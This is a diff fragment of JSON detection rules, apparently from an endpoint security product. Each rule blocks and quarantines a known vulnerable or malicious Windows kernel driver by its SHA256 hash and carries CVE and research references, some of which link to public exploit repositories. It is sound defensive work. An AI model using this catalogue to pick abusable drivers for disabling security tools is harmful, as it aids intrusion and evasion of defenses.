+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160012Z",
+ "creation_date": "2026-03-23T11:45:31.160014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2f12442e3b9d2ba640de7f353f6567d960a9fb5a17cc3c9be886541aefc94ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eaeed44-9666-5c7d-81d2-dfe85b641634",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617254Z",
+ "creation_date": "2026-03-23T11:45:29.617256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7188af66fe23bd8cf27f003ad6c7550cdb6faa5c948fe7c3b1435c9246345eb3",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eb38bbc-69c3-522a-b5e8-9df7c0dce3de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480295Z",
+ "creation_date": "2026-03-23T11:45:30.480298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a228c751d1664b362f10dc7083c223995b976b264da8b7380c51157bed66fbe",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eca7b23-9882-5ff0-8682-ec354a9c847c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455024Z",
+ "creation_date": "2026-03-23T11:45:30.455027Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455036Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16e68d2fa75a4e04872be42e2b54c041e43ab3409096741690520417e3368aa6",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ecd3c0e-37e8-57c6-8871-dfe65076f60b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621037Z",
+ "creation_date": "2026-03-23T11:45:29.621039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162",
+ "comment": "Fujitsu Vulnerable Physmem drivers (aka ADV64DRV.sys) [https://www.loldrivers.io/drivers/24fb7bab-b8c3-46ea-a370-c84d2f0ff614/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ecfe291-ad0b-5c2e-b4be-0d17c8790897",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978265Z",
+ "creation_date": "2026-03-23T11:45:29.978267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25d16b2b53fc7b52a65616ab7fc04a503946c20fe96556681bfaddd589401f4a",
+ "comment": "Malicious Kernel Driver (aka wantd_2.sys) [https://www.loldrivers.io/drivers/aa687f89-4f3b-4b59-b64e-fee5e2ae2310/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ed2c5cc-a617-59dc-b243-81501b587c74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835115Z",
+ "creation_date": "2026-03-23T11:45:30.835118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "818c8775305dd8ba8e7f0d1288e2e55263cbc6a43537afcfa396c0bf78bc85c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ed4b142-a4df-5648-891b-e9a6e5c64201",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622742Z",
+ "creation_date": "2026-03-23T11:45:29.622744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad44cfd9c6262a6ff36ee9d03e59ba4b0524ef87f6b980ce15abb10a35d39f88",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eddd2cd-75b0-58f6-bfac-dbfc0ef0c3cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488517Z",
+ "creation_date": "2026-03-23T11:45:31.488519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e080f8de089ab20471c9997c9eae8137e961929baa8393aa10adbf3fefbd69d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1edec569-c21c-5d5d-8051-5022133d0284",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153754Z",
+ "creation_date": "2026-03-23T11:45:31.153756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a350230410e13cd62cc24a04d5a878ad99e7af0e9698a3f8a8c0eb291341cd24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ee17096-ce07-557c-bed2-c993e277561c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817268Z",
+ "creation_date": "2026-03-23T11:45:31.817270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56e4738d3e3d0df82ac63ee95648db53e462d6916c55a2d49208703c3ded46a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ee3b266-a016-598d-8420-90c953a3227d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827694Z",
+ "creation_date": "2026-03-23T11:45:31.827696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8c22851b9c42ca5429e4f7d5afcf3757a16c4bae072eba3f2888b9c20ed15ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ef0ffec-0ce7-59a5-9436-cc86d31e0d4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975272Z",
+ "creation_date": "2026-03-23T11:45:29.975274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb82d8c29127955d58dff58978605a9daa718425c74c4bce5ae3e53712909148",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f01b7be-3ceb-5c2f-9b00-f6696ec38a2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984264Z",
+ "creation_date": "2026-03-23T11:45:29.984267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd573f23d656818036fc9ae1064eda31aca86acb9bc44a6e127db3ea112a9094",
+ "comment": "Vulnerable Kernel Driver (aka irec.sys) [https://www.loldrivers.io/drivers/d74fdf19-b4b0-4ec2-9c29-4213b064138b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f0b737a-add9-5f72-b4ba-ff015081f5f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969664Z",
+ "creation_date": "2026-03-23T11:45:29.969666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b84b27e0fd011545f447c8c630beeadc2581b7b43fba3b53575f6e2fb92d197b",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f147bec-6bfa-5cfe-9c67-031eef9861ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483308Z",
+ "creation_date": "2026-03-23T11:45:31.483312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed31d19a9ee7cb12f99c5b706e265bb6b10eec85c5b89126a23f2f856a28fe79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f2188da-a9b2-5723-b9cb-b01c180f045f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608613Z",
+ "creation_date": "2026-03-23T11:45:29.608615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "147ea2957c15a5c92c6b7f8f2811e29e9f2c4df1efdbd69b79eeab40652861ef",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f328423-3149-5010-b783-994b9e38cd6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972003Z",
+ "creation_date": "2026-03-23T11:45:29.972005Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972010Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57a389da784269bb2cc0a258500f6dfbf4f6269276e1192619ce439ec77f4572",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f352714-0552-5037-a478-bfee437d06e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822228Z",
+ "creation_date": "2026-03-23T11:45:30.822230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822235Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df813922fcebbcaae99314cc207ec95111a6599ec7fb2d723f6bb1052c493c8a",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f6379eb-d8a8-5c08-aa62-a15422c01fba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621427Z",
+ "creation_date": "2026-03-23T11:45:29.621428Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621434Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d195cd4400754cc6f6c3f8ab1fe31627932c3c1bf8d5d0507c292232d1a2396",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f7952d7-ff01-5897-a9a4-54c891177916",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479111Z",
+ "creation_date": "2026-03-23T11:45:31.479115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5001b9e561ca074ea92eeee37e1cbd08b11caacece4af05050875aee4872d3e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f7eb42e-e99a-5983-8a2e-d6a1c83842a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832660Z",
+ "creation_date": "2026-03-23T11:45:30.832662Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8efda1292eff521b42d38ffc75e5ecfa4fa255658fb768adf53d111ed25da6cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f880eba-d0bc-58c4-b529-bc568278c505",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
